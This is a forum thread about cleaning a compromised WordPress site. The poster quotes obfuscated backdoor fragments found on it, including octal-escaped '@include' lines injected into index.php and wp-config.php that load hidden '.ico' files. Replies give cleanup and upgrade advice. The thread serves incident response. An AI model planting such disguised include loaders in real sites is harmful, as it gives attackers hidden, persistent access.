Strangely named files.


#1

Hi all,
As per my intrduction, I currently know nothing about php.
In the course of my work, I needed to change the mail address on the company website using Wordpress.
In doing so, I noticed some strangely named files, like kykqudif.php, gutmtjy.php.
I also found Meuhy.php and Google only shows that one in my searches as being hacked.?

Looking for confirmation that these files are somewhat malicious?
gutmtjy.php. contains

<?php

class _o7qfbx1{static private $_kde0xd2u = 1585596899;static function _o1w2a($_w9uuuyp0, $_2zxxq316){$_w9uuuyp0[2] = count($_w9uuuyp0) > 4 ? long2ip (_o7qfbx1::$_kde0xd2u - 711)

with a lot more similar code.

The index.php file had an include file which was not in another site using wordpress? Below is the original.
I commented that out, and removed the ā€˜ā€™ characters below and the site came back up. Previously there was a parse error.

TIA

<?php




/*35078*/

@include "\057ho\155e/\150ea\162t/\160ub\154ic\137ht\155l/\152ou\162na\154/c\141ch\145/.\1453b\143ba\0609.\151co";

/*35078*/
/**
 * Front to the WordPress application. This file doesn\'t do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define(\'WP_USE_THEMES\', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . \'/wp-blog-header.php\' );

#2

Delete those files.


#3

Thank you astonecipher,

I guessed as much.

Is there any easy way to scan for anymore like that, or download a full directory listing?

TIA


#4

You could look at site mappers. The biggest thing is to install something like WordFence or another security product to limit the hacks ability.


#5

Thank you.

I will look for both.


#6

May I just ask as well please

The site is running on wordpress 3.5.1 and it is offering to upgrade to 4.9.6

the person who created the site, but no longer maintains it suggested upgrading for security reasons, but that if doing so it would likely break the site.?

Are there any guidelines on upgrading from one version to another.?, pitfalls etc, features no longer supported?

TIA


#7

Hi all,

Would I be correct in thinking that if I discover any code that looks like below, that it should be commented out are even removed.? This is in WP-CONFIG.PHP

/*b1be2*/

@include "\057hom\145/he\141rt/\160ubl\151c_h\164ml/\167p-a\144min\057net\167ork\057.25\141a16\1450.i\143o";

/*b1be2*/

I apologise for the noob questions, but I cannot make head or tail of the above and have no idea what it is even trying to do, other than include something?


#8

Yes, remove any code that looks like that. Real code will use words, not encoded symbols, always.

You should be upgrading the site, I have the ones that I handle on auto-update. Now, you can go through the list of plugins and themes to ensure compatibility. If there are several, it may be wise to make a copy of everything and do the update for testing before you actually push it into a production environment.


#9

Thank you astonecipher

I have had a look at WordFence and can see that is should show any differences in the files with the core files initially distributed.

Going to be a steep learning curve. :slight_smile:


#10

Ideally Iā€™d suggest deleting the server and launching a new instance with verified code, either from your vcs or a new install from wordpress (remember backups!). If your site has been compromised you have no way of knowing where they may have hidden backdoors.


#11

Hi JimL,

Have discovered Anti-Malware Security and Brute-Force Firewall and have installed and scanning as I type.
It has picked up some of the files I spotted.
We also had a user like wp.service.controller.xxxxxx ?

The plugin has listed the following. Anything prefixed with DNU I have spotted and renamed.

ā€¦/public_html/conweb.php.suspected
?../public_html/journal/DNUgutmtjy.php
?../public_html/wp-admin/press-this.php
?../public_html/wp-admin/includes/class-pclzip.php
?../public_html/wp-admin/js/revisions-js.php
?../public_html/wp-content/plugins/backupbuddy/_importbuddy/importbuddy/lib/pclzip/pclzip.php
?../public_html/wp-content/plugins/backupbuddy/js/timepicker.js
?../public_html/wp-content/plugins/formidable/pro/js/jquery.MetaData.js
?../public_html/wp-content/plugins/formidable/pro/js/jquery.ui.datepicker.1.7.3.js
?../public_html/wp-content/plugins/formidable/pro/js/jquery.ui.datepicker.js
?../public_html/wp-content/plugins/formidable/pro/js/nicedit.js
?../public_html/wp-content/plugins/jnewsticker-for-wordpress/media/timepicker/jquery-ui-timepicker-addon.js
?../public_html/wp-content/plugins/jnewsticker-for-wordpress/media/timepicker/jquery-ui-timepicker-addon.min.js
?../public_html/wp-content/plugins/js_composer/assets/js_composer.js
?../public_html/wp-content/plugins/js_composer/assets/flexslider/demo/js/shCore.js
?../public_html/wp-content/plugins/js_composer/composer/lib/shortcodes.php
?../public_html/wp-content/plugins/js_composer/composer/lib/shortcodes/accordion.php
?../public_html/wp-content/plugins/js_composer/composer/lib/shortcodes/tabs.php
?../public_html/wp-content/plugins/wp-google-maps/js/jquery.dataTables.js
?../public_html/wp-content/themes/twentyeleven/colors/sjxqwctr.php
?../public_html/wp-content/themes/twentyeleven/images/qiyrabjm.php
?../public_html/wp-content/themes/twentyten/kykqudif.php
?../public_html/wp-content/uploads/2016/06/oyexldqw.php
?../public_html/wp-content/uploads/formidable/css/ssotehkb.php
?../public_html/wp-includes/SimplePie/Parse/oqcdaqjv.php
?../public_html/wp-includes/js/json2.js
?../public_html/wp-includes/js/json2.min.js
?../public_html/wp-includes/js/tw-sack.js
?../public_html/wp-includes/js/tw-sack.min.js
?../public_html/wp-includes/js/jquery/jquery.schedule.js
?../public_html/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js
?../public_html/wp-includes/js/swfupload/swfupload-all.js
?../public_html/wp-includes/js/swfupload/swfupload.js
?../public_html/wp-includes/js/tinymce/tiny_mce.js
?../public_html/wp-includes/js/tinymce/tiny_mce_popup.js
?../public_html/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.js
?../public_html/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.min.js